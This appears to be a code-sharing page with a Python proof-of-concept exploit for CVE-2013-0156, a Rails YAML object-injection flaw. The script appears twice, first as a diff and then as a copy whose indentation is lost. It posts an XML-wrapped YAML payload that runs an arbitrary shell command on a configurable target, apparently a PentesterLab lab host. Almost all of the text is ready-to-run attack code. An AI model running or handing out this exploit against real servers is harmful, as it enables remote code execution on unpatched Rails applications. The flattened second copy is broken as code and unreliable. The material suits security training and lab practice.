shafdo · August 1, 2021 21:00 · shafdo · Aug 1, 2021
diff --git a/cve-2013-0156.py b/cve-2013-0156.py
 #!/usr/bin/python3

 '''
 Date: Monday, August 2, 2021
 Description: CVE-2013-0156: Rails Object Injection (Detailed POC) 
 Created By: ShaFdo (twitter: @ShalindaFdo)
 -----------------------------------------------
 Dependencies: requests
 Usage: ./cve-2013-0156.py
 Additional Notes: Make sure you mark "cve-2013-0156.py" as an executable before running it :).
 '''

 import requests

 # -=-=-=-=-=-=- Edit Bellow -=-=-=-=-=-=-
 host = "http://ptl-0a8563d6-93c3450a.libcurl.so"	# Target URL
 command = "id > public/results.txt"					      # Command to execute
 # -=-=-=-=-=-=- Edit Above -=-=-=-=-=-=-


 # [INFO] Set the content-type header to text/xml to tell the server that we're sending stuff as XML.
 request_headers = {
 	"Content-Type": "text/xml",
 }


 # [INFO] Injected the Ruby payload inside the XML (Payload source: https://pentesterlab.com/exercises/cve-2013-0156/course).
 xml_payload = """
 <?xml version="1.0" encoding="UTF-8"?>
 <exploit type="yaml">--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
 ? |
  foo
  `{}`;(RUBY; @executed = true) unless @executed
  __END__
 : !ruby/struct
  defaults:
    :action: create
    :controller: foos
  required_parts: []
  requirements:
    :action: create
    :controller: foos
  segment_keys:
    - :format
 </exploit>
 """.format(command)


 # [INFO] Send Request with appropriate headers & the XML payload attached to the HTTP body.
 res = requests.get(host, data=xml_payload, headers=request_headers)


 if(res.status_code == 200):
 	print("[+] Payload Executed Successfully")
 else:
 	print("[-] Got Error Code {} along the way.".format(res.status_code))
	#!/usr/bin/python3

	'''
	Date: Monday, August 2, 2021
	Description: CVE-2013-0156: Rails Object Injection (Detailed POC)
	Created By: ShaFdo (twitter: @ShalindaFdo)
	-----------------------------------------------
	Dependencies: requests
	Usage: ./cve-2013-0156.py
	Additional Notes: Make sure you mark "cve-2013-0156.py" as an executable before running it :).
	'''

	import requests

	# -=-=-=-=-=-=- Edit Bellow -=-=-=-=-=-=-
	host = "http://ptl-0a8563d6-93c3450a.libcurl.so" # Target URL
	command = "id > public/results.txt" # Command to execute
	# -=-=-=-=-=-=- Edit Above -=-=-=-=-=-=-


	# [INFO] Set the content-type header to text/xml to tell the server that we're sending stuff as XML.
	request_headers = {
	"Content-Type": "text/xml",
	}


	# [INFO] Injected the Ruby payload inside the XML (Payload source: https://pentesterlab.com/exercises/cve-2013-0156/course).
	xml_payload = """
	<?xml version="1.0" encoding="UTF-8"?>
	<exploit type="yaml">--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
	? \|
	foo
	`{}`;(RUBY; @executed = true) unless @executed
	__END__
	: !ruby/struct
	defaults:
	:action: create
	:controller: foos
	required_parts: []
	requirements:
	:action: create
	:controller: foos
	segment_keys:
	- :format
	</exploit>
	""".format(command)


	# [INFO] Send Request with appropriate headers & the XML payload attached to the HTTP body.
	res = requests.get(host, data=xml_payload, headers=request_headers)


	if(res.status_code == 200):
	print("[+] Payload Executed Successfully")
	else:
	print("[-] Got Error Code {} along the way.".format(res.status_code))